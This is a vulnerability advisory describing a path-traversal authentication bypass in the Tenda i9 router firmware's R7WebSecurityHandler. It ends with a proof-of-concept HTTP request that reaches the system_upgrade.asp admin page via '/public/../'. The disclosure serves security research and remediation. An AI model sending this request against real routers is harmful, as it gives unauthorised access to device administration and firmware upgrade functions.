# Tenda i9 Router Path Traversal Leads to Authentication Bypass Vulnerability ## Vulnerability Overview A vulnerability exists in the Tenda i9 router firmware that enables whitelist bypass via path traversal. The flaw is located in the `R7WebSecurityHandler` function, which is intended to act as a security guard by checking URL prefixes (e.g., `/public/`) to grant unauthorized access to static resources. However, the application fails to validate or normalize the remaining parts of the URL, allowing an attacker to use directory traversal sequences (`../`) to escape the restricted directory and access sensitive administrative pages. ## Impact Scope - **Vendor**: Tenda - **Product**: i9 - **Version**: V1.0.0.5(2204) - **Firmware Download**: https://www.tenda.com.cn/material/show/2482 ## Remediation The page does not provide specific patch code but indicates that the `R7WebSecurityHandler` function needs to be fixed to ensure proper normalization of the URL before whitelist checks, preventing directory traversal sequences from being parsed. ## Proof of Concept (PoC) ```http GET /public/../system_upgrade.asp HTTP/1.1 Host: 192.168.6.2 Accept-Language: en-US,en;q=0.9 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Connection: keep-alive ```